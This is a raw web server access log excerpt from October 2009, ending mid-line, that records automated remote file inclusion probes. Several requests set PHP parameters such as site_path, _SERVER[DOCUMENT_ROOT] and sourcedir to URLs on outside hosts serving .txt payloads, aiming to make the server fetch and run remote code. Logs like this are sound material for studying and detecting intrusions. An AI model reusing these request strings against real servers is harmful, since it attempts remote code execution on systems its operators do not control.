203.229.58.122 - - [13/Oct/2009:05:22:16 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:05:22:17 -0400] "GET //include/admin.lib.inc.php?site_path=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:05:22:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21659 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:05:22:38 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
77.242.37.212 - - [13/Oct/2009:05:22:59 -0400] "GET /logs/error_log.Q109090700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
69.175.21.186 - - [13/Oct/2009:05:25:19 -0400] "GET /?sourcedir=http://www.kms75.or.kr/web/data/member/AK1??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.175.21.186 - - [13/Oct/2009:05:25:19 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://